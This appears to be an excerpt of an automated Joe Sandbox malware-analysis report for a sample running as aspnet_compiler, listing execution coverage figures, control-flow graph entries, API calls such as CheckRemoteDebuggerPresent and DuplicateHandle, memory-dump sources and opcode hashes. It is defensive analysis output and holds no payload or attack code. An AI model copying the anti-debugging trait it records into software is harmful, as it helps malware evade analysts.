                                                                                                                                                                                                                                                                                        • Opcode ID: d9ad3efc35fa8b416f73e6fd9b5130605c5b10339b4c796a30493a3edbfb8fe1
                                                                                                                                                                                                                                                                                        • Instruction ID: 367901f1fd53a630acdc7329e0f6372709a20348b87d76e8942a5b895f7d1399
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9ad3efc35fa8b416f73e6fd9b5130605c5b10339b4c796a30493a3edbfb8fe1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B11AF76504244CFCF15CF10D5C4B16BF61FB94324F24C5A9D8095B656C33AE956CBA1

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage

                                                                                                                                                                                                                                                                                        Dynamic/Packed Code Coverage

                                                                                                                                                                                                                                                                                        Signature Coverage

                                                                                                                                                                                                                                                                                        Execution Coverage:8.5%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                        Signature Coverage:60%
                                                                                                                                                                                                                                                                                        Total number of Nodes:5
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                        Show Legend
                                                                                                                                                                                                                                                                                        Hide Nodes/Edges
                                                                                                                                                                                                                                                                                        execution_graph 25709 1607298 25710 16072dc CheckRemoteDebuggerPresent 25709->25710 25711 160731e 25710->25711 25707 696c8f8 DuplicateHandle 25708 696c98e 25707->25708

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1832 1607298-160731c CheckRemoteDebuggerPresent 1834 1607325-1607360 1832->1834 1835 160731e-1607324 1832->1835 1835->1834
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0160730F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2451093874.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1600000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3662101638-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1654bf746b93516bb9658a5e9d6da061ea5420c93c7f3b4c5d662ea801c996ac
                                                                                                                                                                                                                                                                                        • Instruction ID: 6666e49f9e7789eacaf0c0b0e184aa6a673a8696f2077a6d16e22d77e12b5409
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1654bf746b93516bb9658a5e9d6da061ea5420c93c7f3b4c5d662ea801c996ac
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F2136B1801259CFDB14CF9AC844BEEBBF4AF48310F14841AE855A3340D778A944CF64

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1826 1607291-160731c CheckRemoteDebuggerPresent 1828 1607325-1607360 1826->1828 1829 160731e-1607324 1826->1829 1829->1828
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0160730F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2451093874.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1600000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3662101638-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 672b0b6b2ba619b30a7f144c58fb32a17c1c1e8cb8a7e97b68c56494e8469b0e
                                                                                                                                                                                                                                                                                        • Instruction ID: 165c935586a769e811e8673e5137abd8c44bc8ad3668819c64ca3176df7e9590
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 672b0b6b2ba619b30a7f144c58fb32a17c1c1e8cb8a7e97b68c56494e8469b0e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 732136B6C01259CFDB14CF9AC885BEEBBF4AF48210F15841AE855A7380D338A944CF64

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1838 696c8f0-696c98c DuplicateHandle 1839 696c995-696c9b2 1838->1839 1840 696c98e-696c994 1838->1840 1840->1839
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0696C97F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2460157637.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_6960000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5f4df830d3b9af17b7eeb1a4324d3983f357d755c74439c4b442f2d3e7680b21
                                                                                                                                                                                                                                                                                        • Instruction ID: 58208d5bc3712ce05094da12f5ddd38cab7fbbaa2e9e4a065841930b7bfcaf9a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f4df830d3b9af17b7eeb1a4324d3983f357d755c74439c4b442f2d3e7680b21
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E62103B5D01308DFDB10CFAAD984ADEBBF5EB48314F24841AE858A7750D339A940CFA0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1843 696c8f8-696c98c DuplicateHandle 1844 696c995-696c9b2 1843->1844 1845 696c98e-696c994 1843->1845 1845->1844
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0696C97F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2460157637.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_6960000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c9b3c977dddcc8d26820634c424ae58807c2483b87736a89fd8fa2dfaee37d46
                                                                                                                                                                                                                                                                                        • Instruction ID: 51ae919ccb6dfba5977c3480b1f835b62293f625d9f2c3b8e906b45546e373cc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9b3c977dddcc8d26820634c424ae58807c2483b87736a89fd8fa2dfaee37d46
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB21D2B5D01348DFDB10CFAAD884ADEBBF8EB48314F14841AE958A7350D375A940CFA4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2449766534.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_157d000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 48333ffade1efef6198254ed9b4777f3a81127e984adb911c0e30962bc08783e
                                                                                                                                                                                                                                                                                        • Instruction ID: 0ab0fee7851cead2a0b9dd5401ea8966e02bf2139f0bbd22b4bc0a02a596ab9e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48333ffade1efef6198254ed9b4777f3a81127e984adb911c0e30962bc08783e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2210075604200DFDB16DF54E980B26BBB5FF84314F24C96DE90A4F282D33AD407CA62
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2449766534.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_157d000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 0dc1ea1169e633858e86da044e7df9594a0d79749321a160b0992fdcdfff8e91
                                                                                                                                                                                                                                                                                        • Instruction ID: bd5e1a90d6bbd2a6b32f2354b3e53b9dccbf6e566abf11e5cf333ca9ab4b6d21
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0dc1ea1169e633858e86da044e7df9594a0d79749321a160b0992fdcdfff8e91
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 952168755093808FDB13CF24D990B15BF71BF46214F28C5EAD8498F6A7D33A980ACB62